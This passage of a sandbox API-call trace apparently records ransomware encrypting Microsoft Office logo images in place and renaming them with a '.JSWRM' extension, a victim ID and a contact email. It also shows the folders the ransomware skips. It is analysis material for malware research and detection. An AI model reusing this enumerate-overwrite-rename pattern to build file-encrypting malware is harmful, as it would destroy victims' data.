office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.022] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a63f068, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a63f068, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12d1, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-black_scale-180.png", cAlternateFileName="MSA13D~1.PNG")) returned 1 [0133.022] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.023] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0133.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.024] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4817) returned 1 [0133.024] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.024] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x12d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x12d0, lpOverlapped=0x0) returned 1 [0133.026] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.026] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x12d0, lpOverlapped=0x0) returned 1 [0133.026] CloseHandle (hObject=0x238) returned 1 [0133.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.027] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a63f068, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-black_scale-80.png", cAlternateFileName="MSACCE~1.PNG")) returned 1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.027] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0133.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.028] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2514) returned 1 [0133.028] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.028] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9d0, lpOverlapped=0x0) returned 1 [0133.030] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.030] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9d0, lpOverlapped=0x0) returned 1 [0133.030] CloseHandle (hObject=0x238) returned 1 [0133.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.032] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a63f068, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a63f068, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a63f068, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xba5, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-white_scale-100.png", cAlternateFileName="MS13E6~1.PNG")) returned 1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.032] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0133.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0133.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0133.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.033] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2981) returned 1 [0133.033] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.033] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xba0, lpOverlapped=0x0) returned 1 [0133.035] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.035] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xba0, lpOverlapped=0x0) returned 1 [0133.035] CloseHandle (hObject=0x238) returned 1 [0133.035] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.036] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6192e9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6192e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a63f068, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xebc, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-white_scale-140.png", cAlternateFileName="MSACCE~4.PNG")) returned 1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.036] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0133.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.037] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3772) returned 1 [0133.037] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.037] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xeb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xeb0, lpOverlapped=0x0) returned 1 [0133.039] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.039] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xeb0, lpOverlapped=0x0) returned 1 [0133.039] CloseHandle (hObject=0x238) returned 1 [0133.040] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.040] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6192e9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6192e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a63f068, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x132f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-white_scale-180.png", cAlternateFileName="MSACCE~3.PNG")) returned 1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.041] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0133.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.042] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4911) returned 1 [0133.042] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.042] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1320, lpOverlapped=0x0) returned 1 [0133.044] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 